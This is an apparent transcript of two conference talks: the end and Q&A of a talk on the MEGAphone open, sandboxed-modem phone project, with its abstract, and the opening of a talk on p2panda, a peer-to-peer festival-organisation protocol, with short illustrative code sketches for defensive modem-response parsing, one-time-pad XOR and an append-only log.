And the naughty little things that we can't trust, in particular the cellular modem, we want to have sandboxed and quarantined so that it can't spread its naughty plague of whatever vulnerabilities it has in there. Again, they are black boxes, we can't trust them, they're too hard for us to implement. And so this is kind of a decision that we've taken. We'd much rather have a fully open 4G modem. If someone makes one, fantastic, we'll incorporate it straight in because the system is designed to be easy to change. But in the meantime, we have to kind of make do with what there is. The great thing is that these M.2 cellular modems are used in vending machines, in cars, in all sorts of things. So they're just common as, again, if you had to scavenge them in the future, this would be quite feasible. And it also means we can upgrade. So we have two of these slots, so we could actually have a dual 5G Commodore 64. Because who wants to have to wait extra time when you're downloading your games, right? And 40 kilobytes can take a long time to download if you've only got one 5G link, right? So we'll have two of them so we can do it in parallel. Because who wants to wait more than about four milliseconds to download new software? And again, limited communications availability in these kind of oppressive environments, this is actually key. You might only have short communications windows. So while it's a little bit tongue-in-cheek, it's not entirely. And of course, with the Serval Mesh, we've been doing UHF packet radio. So we've put in tri-band LoRa-compatible radios in there. Not LoRaWAN. We're doing it fully decentralized. We're just sending out radio packets and listening in with the modules. We've also got ESP8266 Wi-Fi and some Bluetooth in there. So that's some other potential options. Acoustic networking, so we've got four microphones that are directly connected to our FPGA. So we can do crazy signal processing on that. And we've got a nice loudspeaker that should work up into the ultrasonic range. So we could even have quite decent communications over 10 or so meters in the acoustic band. And there's a crazy bunch, and I've forgotten the name of the research group, that do air gap jumping. And they've done some quite crazy things with acoustics with, you know, if you leave your headphones plugged into your computer on your desk in a headphone jack, you can software reconfigure that and make that so it's a speaker and microphone. So anyone that's interested in that, hold on a minute afterwards and I can try and find the links for you. We've also got an infrared LED. And so the idea with all of these kind of things and whatever else you can kind of do is that it should be really hard for an adversary to actually jam all of these things at the same time. You know, you might be able to do broadband RF jamming, but that's not going to stop the acoustics or the LED. And even if you can kind of make a lot of noise, it's going to be really hard to block, you know, the IR LED if people are kind of holding the devices near one another to do delay tolerant transfer. And of course, any other crazy things that people come up with, again, a simple system design means that you can extend it easily yourself. Okay. Security independence. So the operating system runs in our little 8-bit CPU, which is basically a slightly enhanced version of the Commodore 64 CPU. It has an 8-bit hypervisor, which is 16 kilobytes in size, a hardware limitation, because we don't want it getting bigger.
If it gets 16K, then you have to throw some other things out and go, right, what does it actually really need to do so that you still have a system which is actually much more verifiable? And this kind of small software, it should be quite possible on this machine to run a simple C compiler, for example, to be able to compile the software that is actually running the core operating system. So we can have that whole complete off-grid operation. We've already talked a little bit about having the untrustable components fully sandboxed. So, for example, the cellular modems only have an AT command serial interface to the rest of the system. And so this is going to make it much harder for an adversary to work out how with a fully compromised cellular modem, you can compromise the rest of the system by giving presumably bogus responses to AT command requests. And because we know that's where the vulnerable point is, we can put a lot of effort in our software to really interrogate the command responses that are coming back and look for any AT command responses with semi-colon drop tables and all the rest of it in there. It should be pretty straightforward to pick up. So we also have an integrated hardware and software inspector so that you can real-time verify. So this is a little bit fun. So I can hit MegaTab. And so we call it Matrix Mode, for good reason. So the system is still running in the background. So the slides are still there. So I can go back to the previous slide. I can begin to say it was a joystick actually when I'm in there. There you go. I'll file a bug for that. But we can, if I go back into it, we can look at all of memory in real-time. So if you are truly paranoid and you're about to, for example, do some encrypted email on your digitally sovereign device, you could actually go into this, stop the CPU, and then inspect every byte of memory and compare it to your physical printout of the 30 or 40 kilobytes of your software and go, what the fuck is that? Well, you might, every time you might do half a kilobyte or something, right? And verify it so that progressively over time, you've actually verified that the system is always byte identical at that point in time to what it should be doing. And again, the simplicity, we only have one program running at a time. So you know exactly what the system is doing. We can task switch. We've got a built-in freeze cartridge. If I press the restore key, anyone who's used a Commodore 64 with an action replay will probably recognize the inspired format. And so that's our program. They're running with hardware thumbnail generation. The colors are a bit wrong. We need to fix that. But we've got other software that we've had running on it. And so if we wanted to break up the presentation with a quick game of Gyrus, for example, we can do that. I need to switch the joystick port. We can do that. And then we can go back and pretend that we weren't doing anything naughty at all. And of course, I forgot to save what I was doing first, right? So I have to load the program again. So that's my bad. But that's right, because reboot time is about two seconds. Oops. So the worst part now is that we actually, we haven't got a command to jump through the slides. And so it actually takes a little bit of time for it to render each slide as we go through. So that's my punishment for not saving first. But actually, what we might do, we'll skip that for the moment. 
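Coming back to the AT command quarantine mentioned a moment ago: because that serial interface is the modem's only channel into the rest of the system, the hardening is mostly defensive parsing of whatever comes back over it. A sketch of the flavour of checks involved, with invented helper names and nothing taken from the actual MEGAphone firmware:

    #include <stdbool.h>
    #include <stddef.h>

    /* Sketch: treat every byte from the cellular modem as hostile input and
     * accept only short, printable, whitelisted response shapes. */
    extern int  modem_getc_timeout(unsigned ms);               /* hypothetical UART read with timeout */
    extern bool matches_expected_response(const char *line);   /* "OK", "ERROR", "+CREG: ...", etc. */

    static bool allowed_char(int c)
    {
        return (c >= 0x20 && c <= 0x7e) || c == '\r' || c == '\n';   /* printable ASCII plus CR/LF */
    }

    /* Returns the length of one validated response line, or -1 to drop it. */
    int read_at_response(char *out, size_t max)
    {
        size_t n = 0;
        int c;
        while ((c = modem_getc_timeout(100)) >= 0) {           /* bounded wait, never block forever */
            if (!allowed_char(c))
                return -1;                                     /* binary junk: reject outright */
            if (n >= max - 1)
                return -1;                                     /* hard length cap, no dynamic allocation */
            out[n++] = (char)c;
            if (n >= 2 && out[n - 2] == '\r' && out[n - 1] == '\n')
                break;                                         /* end of one response line */
        }
        out[n] = '\0';
        return matches_expected_response(out) ? (int)n : -1;   /* anything unexpected gets dropped */
    }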
And we're kind of at the right point anyway to talk about it, which is the audio paths in a mobile phone. This is a really important area to protect. So it's so important that it's the only diagram that I've put in the entire presentation. So at the top, we have a normal mobile phone. So basically, what we see is that the untrustable cellular modem is not merely untrustable. It's like an evil squid that has tentacles that reach into every part of your mobile phone that you really don't want it getting into. So it has the direct connection to your microphone and speaker. The normal CPU on your mobile phone usually has to say, pretty please, oh, untrustable, completely untrustworthy cellular modem, may I please have something which you're going to tell me is the audio that's coming in through the microphone. Whether it's actually the audio or not, that's a whole separate thing. They might be doing all manner of crazy things first because you can't tell because there's a big fat black box in the way. And then just to make sure that it can fully compromise what you're doing, often it's on the same memory bus. And so you might go, oh, I'm being all secret squirrel from the cellular modem and not asking it anything. And it's just quietly lifting the covers and looking at what you've got under them going like, oh, no, no, no, that byte's wrong. You really want that value in that byte. And likewise, the RAM and the storage. So the cellular modem can totally compromise your boot loader and all of that kind of stuff along the way. Just to say that that's not really a very survivable model or a very resilient model or a very secure model for a phone. So what we have instead is that we've basically put the fully untrustable thing completely out in its own little tiny shed. We've got the tin can and string between us and it with a very controlled interface. And the microphone and speaker, thank you very much, are directly connected to our FPGA. So we can do encryption at the microphone and decryption at the speaker. And the storage is secure, so we can even have massive one-time pads. So we could actually do SIGSALY-style, provably secure communications over distance, if you can set up the key material beforehand for a one-time pad. So it's a radically different approach to what we see with devices out there at the moment. So we'll just get the last few slides up again. Oh, I never got them. Oops. So even simple software can have bugs, this is where we need many eyes. I think if I load this one first, yep, and now I can load the other one, because it just hadn't loaded the fonts in. Yep, cool. That's coming. Yep. And you can even use the joystick to move around in the text if you want to. Okay. So if we think then about this whole, what are we actually trying to achieve around this, and what are some of the things that we need? And the Commodore-derived 8-bit platform, to us, has a whole pile of advantages as a basis for doing this. Now, we could have done it with a completely different platform. We're thinking, like, RISC-V, for example, is a nice open platform, could be an idea. It could be that the RISC-V CPU is actually too complicated to verify and trust yourself, is my kind of view, but I'm happy that other people might disagree with me. Multiple germ lines, totally different ways of doing things, so at least one of them keeps working at any point in time would be really, really good. And we're going to show you combination things as well.
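Going back to the encryption-at-the-microphone, decryption-at-the-speaker idea above: because the audio now terminates at our own hardware rather than at the modem, that step really can be as small as an XOR against pad material. A toy illustration in C, with the usual caveat that a one-time pad is only secure if the pad is truly random, at least as long as all the traffic, never reused, and kept secret:

    #include <stdint.h>
    #include <stddef.h>

    /* Toy one-time-pad step over an audio sample stream.  The same call decrypts
     * on the far side; *pad_pos must advance identically at both ends, and no
     * byte of pad[] may ever be used twice. */
    void otp_xor_samples(uint8_t *samples, size_t n,
                         const uint8_t *pad, size_t *pad_pos)
    {
        for (size_t i = 0; i < n; i++)
            samples[i] ^= pad[(*pad_pos)++];
    }

Back to those combination ideas.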
One of the things we're looking at is having, for example, a Raspberry Pi running the Pi port of Android that somebody else maintains, so I don't have to do it. And then having the 8-bit layer actually virtualizing all of the I/O around that, including access to the SD card storage, including access to the screen. And this actually also makes it possible for us to make custom mobile devices for people living with disability. And actually, so that the Android, again, is easy to maintain because we don't even have to recompile it. We can just get the standard version and then make it think it's got a normal touchscreen when in actual fact it might have some completely different input method going on. So there's a bunch of advantages, and I've run out of the official time that I allotted, so I'll quickly go through and then we'll go into questions. So the C64 platform is really well documented, so there's a whole pile of tools and everything, programming languages, so this is pretty straightforward to go through. We've already talked about capability maintenance. Again, so there's actually another key point, making the hardware big actually is a massive advantage because then we can do normal PCB fabrication. We don't have to do any BGA part placement, which is a real pain to do in your home oven, it is possible, but you don't want to have to learn how to do it in the digital winter. And yet it's actually this kind of similar size to existing kind of devices out there. So there's a bunch of advantages with that. There's a whole pile of different things that we really would like some folks to help us with to try and get this finished and out there for people to try out and to be able to mature it and make it work. So it doesn't matter whether you've ever programmed an 8-bit computer or have ever done any FPGA work or PCB work or whatever, there's lots of space for people to join in what we think is actually both an important and a really fun and enjoyable project to work on. And so really I just want to finish by saying that I think as I was thinking about this talk and preparing for it, I think actually it is a call to action. The digital autumn has begun. Digital winter is on its way. We don't know when it's going to come and it might come a lot quicker than we would really like it to come. Myself and the people who are already working on the project, we can't do everything alone. We're doing what we can. We're going to try and organize another event in early April up in Berlin. But there's no need to wait for that to get involved. We'll be around at the vintage computer area if anyone wants to come and have a look or ask anything about how you might get involved or just play around with the platform. It's quite fun to use. And yeah, we'll leave it at that point. So any questions would be really welcome. That was incredible. You have the best presenting setup that I've ever seen at the Congress. Thank you. The joystick is amazing. And the joystick's also open source hardware. I can give you the plans to make one of those yourself from parts. It's a spare joystick part for arcade games, basically. Yes, please. Yeah. Okay, we're taking questions. I remind you, we have six microphones in the audience. We also have the amazing signal angel that's going to relay questions from the Internet. And we're going to take one right now. Okay, so you already talked about some events, but maybe can you elaborate a bit more on how you're planning to involve the community?
Okay, so how are we going to involve the community? Basically any way the community would like to be involved. At the moment, in terms of the phone, it's myself, kind of working at a university. And we have kind of a couple of part-time students working on things. So the bus number is disturbingly near one at the moment. So there's ample scope to help. We've got a few other people who are helping with the MEGA65 project itself. And so there's obviously this crossover in that. But what would be really great would be to find, for example, a couple of people who are willing to work on software, primarily coding in C. So you don't even have to know any 6502 assembler to begin with, to do things like finishing off the dialer software and things that we demonstrated back in January and get it all working so we can actually walk around with a pair of large plastic bricks by our heads talking on the phones that we've actually created. That would be a really great way to get some initial forward movement. And then things like case design. There's a whole bunch of stuff that we'd welcome involvement on. Thank you. Do we have more from the Signal Angels? Yes, we do. So OK. There's a question: when will a prototype be available? OK. When will a prototype be available? I'm happy to give out blank PCBs or post them to people. So I've got to actually pack them with me. We've got the next prototype actually being built at the moment. So these can be built for about 400 euros at the moment. So you can buy five of these instead of an iPhone. So it's economically survivable as well in comparison. It's actually one of the really quite funny things is we're kind of making this and going like a few person-years of effort and we can already make a mobile phone. OK, it's not as small and schmick, but it's got a joystick port. Does your iPhone have a joystick port? So it's amazing what we've actually been able to do quite quickly. So it's the kind of project where if we do have people kind of come in to help us, by next Congress, we ought to have people running around with MEGAphones and being able to communicate in fun and independent kind of ways. So yeah. Thank you. Microphone one, please. Sure. Thanks for a cool talk. And I have another question because you want to reduce black boxes, but what about encryption, because it's really complex, and how do you plan to reduce this black box? OK, so an excellent question. So the best encryption there is is actually the simplest. It's called one time pad. So if you can actually meet with people. So again, if we're talking about focusing on supporting local communities, well another, if you get your MEGAphone and the other person's MEGAphone and you come in infrared range, for example, and then you shake them like martinis to generate some random data and you do that until you've decided you've got enough one time pad and that one time pad is secure enough in your device, then actually like XOR is pretty easy to debug, right? Thank you. Microphone number three. So you talked about the form factor right now, the Nintendo Switch. Yep. Do you have plans on going smaller than that? More like a classic mobile phone? Yeah. I think it's actually quite possible. So this is, if you like, the first version is this one. So you can see it's about five centimeters thick. The second one, we think we can get down to about four centimeters thick, but it's otherwise the same size as PCB.
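To make that one-time-pad answer a bit more concrete, here is a minimal sketch of the idea, written in Python purely for readability (the actual MEGAphone software is written in C, so treat this only as an illustration; the pad here is just random bytes standing in for key material the two phones would have generated together beforehand):

```python
import os

def xor_bytes(data: bytes, pad: bytes) -> bytes:
    """XOR every data byte with the matching pad byte -- this is the whole cipher."""
    assert len(pad) >= len(data), "a one-time pad must be at least as long as the message"
    return bytes(d ^ p for d, p in zip(data, pad))

# Hypothetical pre-shared pad, standing in for the random material the two
# phones collected together (e.g. while "shaking them like martinis").
pad = os.urandom(64)

audio_frame = b"raw samples from the microphone"   # stand-in for real audio data
ciphertext  = xor_bytes(audio_frame, pad)          # done right next to the microphone
recovered   = xor_bytes(ciphertext, pad)           # done right next to the speaker
assert recovered == audio_frame

# Each pad byte must be used exactly once and then destroyed; reusing pad
# material is what breaks the provable security of the scheme.
```

As long as the pad really is random, secret and never reused, the XOR step is all there is to verify, which is exactly why it is so easy to debug. Back to the form-factor question: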
We've got a student at the moment who's going to try and work on making one that's about the size of only the screen, still probably about four centimeters thick. And we think that that's going to be quite, the PCB layout, he's basically been cursing me for the last three months to try and get all the tracks routed without it needing to be a 15-layer sponge-torte kind of PCB, but that should be quite possible to do. And again, that's the kind of thing, once you've got a working prototype, then some people are like, okay, we're going to be on the miniaturization team to try and make something which is even smaller. But there's always trade-offs in these things. Again, the smaller you make it, the less solar panel you can have on the back. So there's kind of these things. But certainly trying to make it as thin as we can, I think, makes a whole pile of sense. Honestly, you can make it smaller, but I don't think you should because when the zombie apocalypse happens, it's a communication tool and a weapon. Yeah, exactly. That's right. It's kind of, you know, exactly. Or you can use a full-size one as well, right? It's kind of got, you know, quite a nice solid metal keyboard in there as well. A question from the internet, please. Sure. So what do you think about the OpenMoko phone? The OpenMoko phone. So I'm trying to remember the details about those. I mean, the whole, again, everything that's being done on all of these fronts to make fully open devices with as few black boxes as possible is fantastic. So as I say, if OpenMoko can make an M.2 form factor cellular modem that we can put in the MEGAphone, I would be so, so happy. But we can do a whole pile of stuff while we're waiting for that to happen. Thank you. We actually had a talk yesterday from one of the people behind the OpenMoko. So you can watch the recording if you want. Next question, microphone one. Sure. Hey, thank you for the great talk. I was interested in the MEGA65 itself. Is that available? Is it sold? Yes. Okay, so the two most common questions we have about the MEGA65 are, can I buy one now and how much does it cost? Unfortunately, the answer to both of those is we don't yet know exactly. It will be a three-digit number in euros for the price. This is pretty certain. But at the moment, our big challenge is we, so this one is, it's a prototype made with vacuum form molding. So each case costs upwards of 500 euros for the case. This is not really sustainable. So we know we need to make injection molding tooling for that. And so the guys from the German part of the MEGA65 team are running a fundraiser. I just have to be a little bit careful with that, in that Australian law for fundraising is a bit weird. So I am not doing any fundraising. Some people here in Germany are doing some fundraising to try and raise the money for the mold. So if you look at mega65.org, you can find out what they're doing in that space and have a look at that. Thank you. Do we have more internet questions? No? Cool. Cool. I think that's it. So thank you again for the wonderful talk. My pleasure. Thank you. Thank you.
Civil society depends on the continuing ability of citizens to communicate with one another, without fear of interference, deprivation or eavesdropping. As the international political climate changes alongside that of our physical climatic environment, we must find ways to create mobile communications systems that are truly resilient and sustainable in the face of such shocks. We have therefore identified a number of freedoms that are required for resilient mobile phones: Energy, Communications, Security, Innovation, Maintenance and Scale-Dependency. These can be summarised as making it possible for people to create, maintain and develop mobile communications solutions, without requiring the capital and resources of a large company to do so. In this lecture I will explain why each of these is necessary, as well as describing how we are incorporating these principles into the MEGAphone open, resilient and secure smart-phone project. In the humanitarian sector we talk about how without energy there is no communications, and without communications there is no organisation, and how without organisation people die. As we see increasing frequency of natural disasters, man-made disasters like wars and unrest, and the distressing intersection of these events, we have been convinced that we need to be able to create mobile communications devices that can not only survive in such events, but be sustained in the long term, and into what we call the coming Digital Winter. The Digital Winter is the situation where the freedoms to create and innovate digital systems will become impossible or highly limited due to any of various interrelated factors, such as further movement towards totalitarian governments, the failure of international supply systems (or their becoming so untrustworthy as to be unusable), the failure of various forms of critical infrastructure and so on. Fortunately the Digital Winter has not yet arrived, but the signs of the Digital Autumn are already upon us: The cold winds chilling our personal freedoms can already be felt in various places. Thus we have the imperative to act now, while the fruit of summer and autumn still hangs on the trees, so that we can make a harvest that will at least sustain us through the Digital Winter with resilient, secure and sustainable communications systems, and hopefully either stave off the onset of the winter, bring it to a sooner end, and/or make the winter less bitter and destructive for the common person. It is in this context that we have begun thinking about what is necessary to achieve this, and have identified six freedoms that are required to not merely create digital solutions that can survive the Digital Winter, but hopefully allow such solutions to continue to be developed during the Digital Winter, so that we can continue to react to the storms that will come and the predators that will seek to devour our freedoms like hungry wolves. The six freedoms are: 1. Freedom from Energy Infrastructure, so that we cannot be deprived of the energy we need to communicate. 2. Freedom from Communications Infrastructure, so that we cannot be deprived of the communications we need to organise and sustain communities. 3. Freedom from depending on vendors for the security of our devices, so that we can patch security problems promptly as they emerge, so that we can sustain communications and privacy. 4. Freedom to continue to innovate and improve our digital artefacts and systems, so that we can react to emerging threats and opportunities. 5. 
Freedom to maintain our devices, both their hardware and software, so that our ability to communicate and organise our communities cannot be easily eroded by the passage of time. 6. Freedom from Scale-Dependency, so that individuals and small groups can fully enjoy the ability to communicate and exercise the preceding freedoms, without relying on large corporations and capital, and also allowing minimising of environmental impact. In this lecture I will explore these issues, as well as describe how we are putting them into practice to create truly resilient and sustainable mobile phones and similar devices, including in the MEGAphone open-source/open-hardware smart phone.
10.5446/53165 (DOI)
Next talk is titled P2Panda and it's about a festival organization platform, a software system. We'll hear about it soon. So a festival organization is usually done by a small group and it can be decentralized. The three guys talking about P2Panda, they did organize some festivals in the past. They're going to probably talk about the festival Verantwortung 3000, which they organized. I think it's Hoffnung 3000 probably. I hope I spelled that right. The platform is used to set up groups, festivals, gatherings, art installations, stuff. What you can think about it. They will present also some fictional ideas of festivals of the future. What I really like, they will talk and tell us everything about pandas. Please give a warm round of applause to Sophie, Andreas and Vincent. Have fun. Hello. The panda, the ingenious being that wins your heart just by rolling around. Its qualities are known and appreciated. The panda is cozy. It is cuddly. It is fluffy. To talk about pandas means to talk about cuteness. It is kind and means no harm. It brings people together and won't let you down. The panda goes on adventures. The panda is cyber. Hello. We are Sophie, Vincent and Andreas. We are the p2panda gang. That is a protocol for organizing festivals in a decentralized manner. We will tell you a little bit about it today. We split up this whole lecture into three parts. I will tell you a little bit about the background of p2panda, its history. Then Sophie will lead over to talking about the actual technical implementation of it. Vincent will end this talk with an outlook on future festivals. One disclaimer. Everything we are going to say is the work of many, many people. We are just a part representing this group. We will only cover a small detail of it. Let's start with a history. On the left you see Laura. To the right you see the panda. Laura is part of a collective named Blatt 3000. It started as a magazine in 2014 in Berlin on experimental music. We were interested in improvised contemporary music. So far we published nine magazines, made two festivals, had many release parties and gave a few lectures. Blatt 3000 consists of Laura, Malte, Sam and me. The whole magazine we started was basically circling around two questions. The first one was what happens if we don't curate at all. We just said we would publish anything people sent to us. We named that non-curation. The second thing was we encouraged people to ask questions and don't say too many answers. We asked people to write fragments or impulses, we called them. To encourage people maybe to say something, I don't know, not so 100%, maybe a little bit stupid. Not to be so fixed in their position, but try something new and think about maybe things other people can then answer to in the following magazines. So this sort of format started to be some sort of platform for fictional ideas. It helped us to start dreaming about what are ways we want to make music together, what are ways to organize ourselves, what are ways to be together, all with a background of music you have to remember. We came from a musical background. We were dreaming about the festivals of the future we want to be part of, the sort of concerts we want to perform. So yeah, from all this reflection on these future ideas we also realized, I mean we are mostly from a German background, so Germans are known for being very critical, with an everything-sucks attitude. So we were the same. 
We were like, all these contemporary music festivals, they suck, experimental music sucks, it's just conservative, it's full of guys, it's very restricted in their curation, in their juries, in their funding structures, all of this sucks. But then we actually also realized, yeah, we kind of started to not go to these concerts anymore and not see this art anymore. But yeah, then we realized, okay, it's actually about the environment in which these things take place, not the art itself. The people are alright, like the music is alright, it's mostly these environments. So we started to think about, yeah, what are these environments, what are these frameworks, like what is this curatorial structure, what are the juries, what is this funding and how can we hack that. So yeah, there was lots of talking in these magazines that was also boring at one point. We wanted to also experiment with actually doing something. From this point on we started to plan a festival, the first one was named Verantwortung 3000. It was like, it took place in Brandenburg on a small farm, or quite large farm actually, with 50 participants. The idea was quite simple, we just said there are all these places you can pick from. The Toilettentrakt, the Goetzhaus, the Seminarraum, the Hof, the lake, many many beautiful places. And people could bring their resources and just share them with each other to do whatever sort of events they wanted to do. This whole thing lasted six days and was a very interesting experience for us, which we then reflected upon in the upcoming Blatt 3000 magazines. So then the magazine shifted from, we publish everything, to a little bit more like, okay, let's learn from what happened. And it kind of raised many many questions for many people. Maybe for a few hackers in this room, who are probably used to chaotic self-organized systems, this is nothing new, but for artists, being in some sort of commission loop for their whole lives, that's quite new. So for many people it kind of shook, was shaking up the whole idea of how to make art actually. So these magazines became some sort of platform to reflect upon that. And this inspired us to work on the next festival. And actually for this time, under the name Hoffnung 3000, we invited other collectives to kind of think together with us what would be the festival of the future for you. Yeah, so we were asking all these people, like different collectives from different backgrounds, and it took us almost a year to plan the next platform. We built this from scratch again, like another platform. The festival took place in Berlin in 2017, this time with a smaller group, but in the middle of the city. So we had a headquarters, and one other specialty of this festival was any sort of GPS position was a potential venue. So the festival could take place in someone's apartment, in the park, in professional venues, but also really anywhere. People started to join in from Tokyo, from Sardinia, from London. Anything which was a GPS position is a potential venue. I'm going to show you a little bit of the platform itself. It's up there. I'm going to have to click like that, I guess. This is the platform. I give you a small demo of what you can do. I think that gets more clear what you can do on Hoffnung 3000. You basically always start with creating resources, because this is what you're going to bring to the festival. There's the market to do that. People just bring whatever they want to share with everyone else. There's different things. 
It can be a skill, it can be an item, it can be something esoteric, something completely virtual. There's also somewhere, there's a panda as well. Where is it? There it is, panda and aga-aga. You can then create a place, give it a title, give it a description, upload some images, give it an address or the actual GPS position I was talking about. It doesn't work anymore. What's it? We don't use Google anymore. That's the old version. Or you can also define it as a virtual space, which was also quite interesting. Many people create a virtual space. What does that mean? It's an event happening in your head. There are some other things, like slot sizes, where you could define when you're not home, and all of these things. Then other people could just create events. What's the title of the event? Description, image. Where does it take place? Okay, cool. Friedrich-Ludwig-Jahn-Sportpark. We had a choir who made a concert there. When is it? Maybe here. Then what resources do you need? Maru de pandas. A creative human I need. A transcriber is already selected. You can also directly see what resources are occupied at this time, so you can't use them. Cool. This is then actually everything you need to make a festival, because then this event just pops up in the calendar and it's there. People can just come. This is what we've done for four days. There's some other fun features here. One is this activity stream. You see it's like an anonymized animal avatar. We were experimenting with the thing that you just don't know who you're working with. It's just a randomized animal avatar. We had a GIF stream. The whole festival was documented in a series of millions of GIFs. There's also a random meeting feature. If you feel bored, you can just click it and then it will put you together with random people in a random place at a random time. This is Hoffnung 3000. This was what we've done in 2017. It's still being developed. You can run your own festivals with this. The source code is available under this address. We made our own page with tutorials on how to set it up and how to use it. Actually, there's also in the next year, there's two festivals happening using Hoffnung 3000. The first one is the Motocool Festival in Cologne in May. The second one is the Femme Music, which is not an actual festival but a gathering of feminist activists. If you're interested, you can just write to their email. Through all of these festivals we've been doing, which were quite music focused, we realized that self-curation, decentralization, anonymization, and all of these things are not exclusively interesting for music festivals. It's more the other way around. There's communities which have been working on this for many, many, many years. For example, the hacking community, the activist communities. We started to realize, this is much more interesting than only making music festivals with this. We founded the Liebe Chaos Verein in Berlin this year, where Sophie and Vincent are also part of, and Blatt 3000 became the Verein's magazine. And the whole Verein is dedicated to these kind of meta questions, what are frameworks, and how can we experiment with them, what does it mean, and let's just put them into reality and see what happens. The next idea we're working on is p2panda. That's the current project of the Verein, or one of the projects we're doing. And there's also the whole idea, let's bring it some steps even further and just say, how can we make the whole festival hackable? 
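One small aside on the random meeting feature just mentioned: the logic behind such a button is tiny, and can be sketched in a few lines of Python. This is not the actual HOFFNUNG 3000 implementation (that lives in the linked repository), just an illustration with made-up example data:

```python
import random
from datetime import datetime, timedelta

def random_meeting(participants, places, now=None):
    """Pick two random participants, a random place and a random time within
    the next 24 hours -- the idea behind the 'random meeting' button."""
    now = now or datetime.now()
    who = random.sample(participants, 2)
    where = random.choice(places)
    when = now + timedelta(minutes=random.randrange(24 * 60))
    return {"who": who, "where": where, "when": when.isoformat(timespec="minutes")}

# Hypothetical example data, not taken from the real platform:
participants = ["panda", "owl", "fox", "quokka"]
places = ["the lake", "the Hof", "a virtual space"]
print(random_meeting(participants, places))
```

Back to the bigger question of making the whole festival hackable: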
How can this whole infrastructure be hacked all the time? So we decided to build a protocol on its own, a protocol to organize resources, events, and places. We decided to build this whole thing on top of Scuttlebutt. Maybe you have heard about it, some of you probably did. It's a fantastic peer-to-peer social network protocol with a really beautiful community with very, very interesting and wonderful people. You can go to their tea house in Komona. And I just say a few things about p2panda itself, just very roughly, we're going to hear much more soon. Basically, what we're interested in in that protocol, which doesn't exist yet, we're about to start developing it. The first thing is it's peer-to-peer, so it's not running on any sort of centralized server infrastructure, which is great because you just open your laptop, you start p2panda, and you have a festival, kind of. And it comes very close to our whole idea of non-curation. We don't want anyone to decide what this festival is, so anyone can decide at any point. Let's open our 10 laptops, and this is our festival. The next thing is it's an open protocol, so this gives us very interesting opportunities to just say, we just agree upon how we want to communicate, but not what and how the data is being displayed. So this gives completely different ideas of what a festival can be. Is it a 3D festival happening in virtual space? Is it a festival for our new bots? We don't know, and we also don't want to know. We just want to give people the opportunity to communicate with each other. And the next thing is, yeah, I mean, if you have a decentralized festival, what does it mean in terms of temporality? Is it happening over the whole year maybe? Maybe the festival never ends. Maybe it's just different sudden bursts like occurring, and this is maybe some sort of gathering, which you could name a festival, maybe. And the next thing is we're going to learn about this soon. Because of these cryptographic features, anyone is kind of able to interact with the system, and your actions, your role in the system is defined by your actions, and not by the permissions which were given to you. So it doesn't matter if you're an administrator, visitor, or participant. And now we're going to hear a little bit more about how this actually works. So Sophie will tell you more. Thank you. APPLAUSE Okay. Thank you, Andreas. The panda goes cyber. And so, like Andreas said, I will now show you, we are still growing ideas of how we like to design and implement the protocol. We already started, but there are still lots of questions. So as said, p2panda will be a collection of tools for users, bots, and developers to set up such festivals as Andreas talked about. And as he also said, it should be really simple. So one of our goals really is that everyone can use it, and it is really accessible, and you don't have to be a developer to use it. Okay. First of all, why peer-to-peer technology, and also basically what is it, I'm sure a lot of people know the term, but it's always worth it to remind yourself, I guess. Okay. Peer-to-peer or person-to-person is essentially about non-hierarchical social relations. So in technical terms, it's an infrastructure. So everyone is equally privileged, there's no server, and it's offline first. So, yeah, and it's offline first, and what also was very important for us and our decision to use a peer-to-peer protocol, that this is really independent of cloud providers. 
And also peer-to-peer is the relational dynamic through which people collaborate with one another to create value in the form of shared resources. And the offline first character means also that you can just start to create your content without internet connectivity. So these were really basically a lot of pros for us to choose this in the first place. Okay, let's dig a little deeper into the technical parts. What's a person, peer, or user in this context? It's basically a cryptographic key pair, like public and private key, I'm sure you know, which is generated when you open p2panda. It's the identity of the user, and a user can be anyone, there's no distinction. It can be a visitor or an administrator, it can be a bot, it can be a person or a collective, it doesn't matter. And this user creates and shares events and resources. How does the user do that? So we use the Secure Scuttlebutt stack, which provides append-only logs. That means that each user has a feed of messages that form this log. And everything is a message that cannot be modified once it is posted. So like here, creating a resource is a message. Also, the messages reference each other, and you have to imagine it like a chain that is forming. Everyone creates their messages on top of their previous message, in their own log. And it's quite elegant to use an append-only log because it uses a conflict-free replicated data type. So this is useful in this peer-to-peer context, or for us, for the p2panda protocol, because it prevents merge conflicts of shared messages. And as you can see, every user does this and forms their feed, their log, on their own. And the question is, now the users in the peer-to-peer universe have to find and connect to each other. And they do this through discovery methods and replication of the messages through the p2panda network. To connect to others, a user broadcasts their identity to advertise their presence, basically. And then they can replicate their logs, which means they share their messages. And here an interesting effect comes from the offline-first nature of peer-to-peer. Imagine that there's a p2panda event going on, and depending on your setup or internet connectivity, there are different views of this event possible. Since some users might already have posted something, but only shared that in their local group via Bluetooth, for example, but not with users in other places, if they were offline. So as you can see here, the yellow user doesn't have all messages from the blue one, and the pink user doesn't have any messages from the yellow one at all. And to our mind, that could mean that there's not only one event going on, but maybe many parallel ones. And we think that this offers many possibilities for things to unfold. Okay, so now, yeah, the data types we use, and I already mentioned them, they consist basically of users, resources, and events. And at the moment, we use these notions, but we also think about other terms, because sometimes they might be a bit limiting. Anyway, to remind you, a user shares and creates events and resources. A resource in our context can be really anything, it can be a guitar, it can be a location, and an event is really basically just a set of resources. For example, a concert. So the pink event now uses the two yellow resources. And p2panda helps users coordinate the process of mapping available resources to the events that need them. And so as you can see here, the resources might be needed at more than one event at the same time. 
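A minimal sketch of that append-only log idea, in Python: each message carries a sequence number and the hash of the previous message, so a user's feed forms a chain that can only grow. This is a simplified illustration, not the real Secure Scuttlebutt or p2panda message format (signatures, encodings and field names differ in the actual protocols):

```python
import hashlib
import json
from datetime import datetime, timezone

def append(log, author, content):
    """Append a message to an author's feed. Every entry stores the hash of the
    previous entry, so the log can only grow and cannot be silently rewritten."""
    previous = log[-1]["hash"] if log else None
    body = {
        "author": author,                # in Scuttlebutt/p2panda this is a public key
        "sequence": len(log) + 1,
        "previous": previous,
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "content": content,
    }
    digest = hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()
    # A real implementation also signs the entry with the author's private key;
    # that is omitted here to keep the sketch short.
    log.append({"hash": digest, **body})
    return log[-1]

feed = []
append(feed, "panda.pub", {"type": "resource", "name": "guitar"})
append(feed, "panda.pub", {"type": "event", "title": "concert", "needs": ["guitar"]})
print(feed[-1]["previous"] == feed[0]["hash"])  # True: the chain is intact
```

Back to the question of resources being needed by more than one event at the same time: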
